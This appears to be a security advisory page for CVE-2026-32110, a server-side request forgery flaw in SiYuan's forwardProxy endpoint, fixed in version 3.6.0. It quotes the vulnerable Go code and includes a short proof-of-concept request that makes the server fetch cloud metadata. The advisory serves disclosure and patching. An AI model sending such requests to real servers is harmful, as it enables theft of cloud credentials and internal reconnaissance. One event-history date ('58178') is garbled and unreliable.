CVE-2026-32110: SiYuan has a Full-Read SSRF via /api/network/forwardProxy

Published Mar 11, 2026
·
Updated

Summary The /api/network/forwardProxy endpoint allows authenticated users to make arbitrary HTTP requests from the server. The endpoint accepts a user-controlled URL and makes HTTP requests to it, returning the full response body and headers. There is no URL validation to prevent requests to internal networks, localhost, or cloud metadata services.

Affected Code File: /kernel/api/network.go (Lines 153-317) func forwardProxy(c gin.Context) { ret := gulu.Ret.NewResult() defer c.JSON(http.StatusOK, ret)

arg, ok := util.JsonArg(c, ret) if !ok { return }

destURL := arg["url"].(string) // VULNERABILITY: Only validates URL format, not destination if , e := url.ParseRequestURI(destURL); nil != e { ret.Code = -1 ret.Msg = "invalid [url]" return }

// ... HTTP request is made to user-controlled URL ... resp, err := request.Send(method, destURL) // Full response body is returned to the user bodyData, err := io.ReadAll(resp.Body) // ... ret.Data = data // Contains full response body } PoC - First, authenticate with your access auth code and copy the authenticated cookie. - Now use the request below for SSRF to Access Cloud Metadata. POST /api/network/forwardProxy HTTP/1.1 Host: <HOST> Cookie: siyuan=<COOKIE> Content-Length: 102

{"url":"http://169.254.169.254/metadata/v1/","method":"GET","headers":[],"payload":"","timeout":7000}' <img width="1230" height="754" alt="Screenshot 2026-03-11 at 1 23 36 AM" src="https://github.com/user-attachments/assets/60486dba-1ccd-4287-8073-b803854756a2" />

Impact - Internal Network Reconnaissance: Attackers can scan internal services - Cloud Credential Theft: Potential access to cloud metadata and IAM credentials - Data Exfiltration: Server can be used as a proxy to access internal resources - Firewall Bypass: Requests originate from trusted internal IP

Other sources

SiYuan is a personal knowledge management system. Prior to 3.6.0, the /api/network/forwardProxy endpoint allows authenticated users to make arbitrary HTTP requests from the server. The endpoint accepts a user-controlled URL and makes HTTP requests to it, returning the full response body and headers. There is no URL validation to prevent requests to internal networks, localhost, or cloud metadata services. This vulnerability is fixed in 3.6.0.

MITRE

Affected Software

3 affected componentsFixes available
SiYuan SiYuan<3.6.0
go/github.com/siyuan-note/siyuan/kernel<=3.5.9
3.6.0
b3log SiYuan<3.6.0

Event History

Mar 11, 2026
CVE Published
via MITRE·08:38 PM
Data Sourced
via MITRE·08:38 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·09:16 PM
DescriptionSeverityWeaknessAffected Software
Mar 12, 2026
Advisory Published
via GitHub·02:23 PM
Data Sourced
via GitHub·02:23 PM
DescriptionSeverityWeaknessAffected Software
Jan 29, 58178
Event
via FIRST·08:50 PM
Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Frequently Asked Questions

1

What is the severity of CVE-2026-32110?

CVE-2026-32110 is considered a critical vulnerability due to its potential for allowing unauthorized access to server resources.

2

How do I fix CVE-2026-32110?

To fix CVE-2026-32110, upgrade SiYuan to version 3.6.0 or later where the vulnerability has been patched.

3

What does CVE-2026-32110 affect?

CVE-2026-32110 affects SiYuan versions prior to 3.6.0, particularly the /api/network/forwardProxy endpoint.

4

Who is impacted by CVE-2026-32110?

Authenticated users of SiYuan versions before 3.6.0 are impacted by CVE-2026-32110 as they can exploit the SSRF vulnerability.

5

What kind of attack is possible with CVE-2026-32110?

CVE-2026-32110 allows for server-side request forgery (SSRF) attacks that can lead to unauthorized access to internal network resources.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203